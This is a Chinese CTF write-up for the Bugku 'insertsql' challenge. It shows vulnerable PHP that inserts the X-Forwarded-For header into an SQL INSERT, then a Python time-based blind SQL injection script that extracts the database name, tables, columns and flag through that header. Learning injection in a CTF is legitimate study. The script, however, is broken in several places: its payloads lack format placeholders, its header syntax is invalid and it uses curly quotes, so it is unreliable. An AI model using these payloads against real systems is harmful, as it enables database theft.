bugku insertsql

Posted liqik

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了bugku insertsql相关的知识,希望对你有一定的参考价值。

题目链接

 

0X00题目给出的php代码

error_reporting(0);

function getIp()
$ip = ‘‘;
if(isset($_SERVER[‘HTTP_X_FORWARDED_FOR‘]))
$ip = $_SERVER[‘HTTP_X_FORWARDED_FOR‘];
else
$ip = $_SERVER[‘REMOTE_ADDR‘];

$ip_arr = explode(‘,‘, $ip);
return $ip_arr[0];



$host="localhost";
$user="";
$pass="";
$db="";

$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");

mysql_select_db($db) or die("Unable to select database");

$ip = getIp();
echo ‘your ip is :‘.$ip;
$sql="insert into client_ip (ip) values (‘$ip‘)";  //将得到的IP插入到数据库
mysql_query($sql);

 

0x01 insert sql漏洞

将消息插入数据库

一般出现地方:电商生成订单接口存在INSERT型SQL注入漏洞,可修改订单金额数据,生成订单时会往数据库插入数据,但此处使用了动态查询语句的方式进行插入,通过注入数据可以达到篡改订单数据的目的

 

本题注入点X_FORWARDED_FOR  

 

0x02 Python 脚本:

  1 import requests
  2 import sys
  3 import string
  4 
  5 def getdblen(url):  #获得库名长度
  6     sql="1‘+(select case when(select length(database())=0) then sleep(4) else 1 end) and ‘1‘=‘1"
  7     for i in range(1,50):
  8         header=X-Forwarded-For:sql.format(str(i))
  9         try:
 10             s=requests.get(url,headers=header,timeout=3)
 11         except:
 12             print("database name len:",i)
 13             break
 14 
 15 def gettablelen(url):  #获得数据表名长度  没有输出 不知道错误在哪 很烦~~,查不到错误。有没有limit 都没有输出
 16     #limit的作用是查询到好几行数据,选取其中的几行  limit 1,1就是 第二行一行的数据(从0开始计算行数)
 17     sql="‘+(select case when(select length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=1) then sleep(4) else 1 end) and ‘1‘=‘1"
 18     for n in range(0,5):
 19         for i in range(1,20):
 20             header=X-Forwarded-For:sql.format(str(n),str(i))
 21             try:
 22                 s=requests.get(url,headers=header,timeout=3)
 23             except:
 24                 print("table %s name len:%d"%(n,i))
 25                 break
 26 
 27 def getdb(url):
 28     database_name=‘‘
 29     sql="1‘ and (case when (substr((select database()) from 0 for 1)=‘1‘) then sleep(4) else 1 end) and ‘1‘=‘1"
 30     #逐个字母破解数据库名,0、1相当于标记了两处变量,用于下面的format语句
 31     for i in range(1,10): #猜测数据库名字在9个字符以内
 32         for str in range(32,129): #通过循环,逐个字母匹配
 33             if chr==128:
 34                 sys.exit(0)#如果没有匹配,就退出循环
 35             header=X-Forwarded-For:sql.format(i,chr(str))
 36             try:
 37                 s=requests.get(url,headers=header,timeout=3)
 38             except:
 39                 database_name+=chr(str)
 40                 print(database_name)
 41                 break
 42     return database_name
 43 
 44 def gettable(url):
 45     table_name=‘‘
 46     payload="‘+(select case when (substr((select group_concat(table_name) from information_schema.tables where table_schema=database()) from 0 for 1)=‘1‘) then sleep(4) else 1 end) and ‘1‘=‘1"
 47     guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
 48     for i in range(1,50):
 49         #print(i)
 50         for str in guess:
 51             if ord(str)==128:
 52                 sys.exit(0)
 53             header=X-Forwarded-For:payload.format(i,str)
 54             try:
 55                 s=requests.get(url,headers=header,timeout=3)
 56             except:
 57                 table_name+=str
 58                 print(table_name)
 59                 break
 60     return table_name
 61 
 62 def getcolumn(url):
 63     column_name=‘‘
 64     sql="‘+(select case when (substr((select group_concat(column_name) from information_schema.columns where table_name=‘flag‘) from 0 for 1)=‘1‘) then sleep(4) else 1 end) and ‘1‘=‘1"
 65     #guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
 66     for i in range(20):
 67         for str in range(32,129):
 68             if str==128:
 69                 sys.exit(0)
 70             payload=X-Forwarded-For:sql.format(i,chr(str))
 71             try:
 72                 s=requests.get(url,headers=payload,timeout=3)
 73             except:
 74                 column_name+=chr(str)
 75                 print(column_name)
 76                 break
 77     return column_name
 78 
 79 def getmessage(url):
 80     message=‘‘
 81     sql="‘+(select case when(substr((select group_concat(flag) from flag)from 0 for 1)=‘1‘) then sleep(4) else 1 end) and ‘1‘=‘1"
 82     for i in range(1,35):
 83         for str in range(32,129):
 84             if str==128:
 85                 sys.exit(0)
 86             payload=X-Forwarded-For:sql.format(i,chr(str))
 87             try:
 88                 s=requests.get(url,headers=payload,timeout=3)
 89             except:
 90                 message+=chr(str)
 91                 print(message)
 92                 break
 93     return message
 94 
 95 
 96 if __name__==__main__:
 97     url="http://123.206.87.240:8002/web15/"
 98     print(getdb(url))
 99     #tablename = gettable(url)
100     #print(tablename)
101     #columname = getcolumn(url)
102     #message=getmessage(url)
103     
104     #print(temp.lower())
105     #getdblen(url)
106     #gettablelen(url)
107     #getdb(url)
108     

代码借鉴了其他人的wp,并加上自己的一点想法,查询名长度等

 

 

总结:要加强写脚本的能力,多学习mysql语句,有好几个语句是因为不对才没有注入成功的。

 

以上是关于bugku insertsql的主要内容,如果未能解决你的问题,请参考以下文章

bugku-writeup-web-源代码

insertSql语句中的trim标签的使用

BugKu——Web——source

bugku 变量覆盖

Bugku——Web——web3

bugku web wp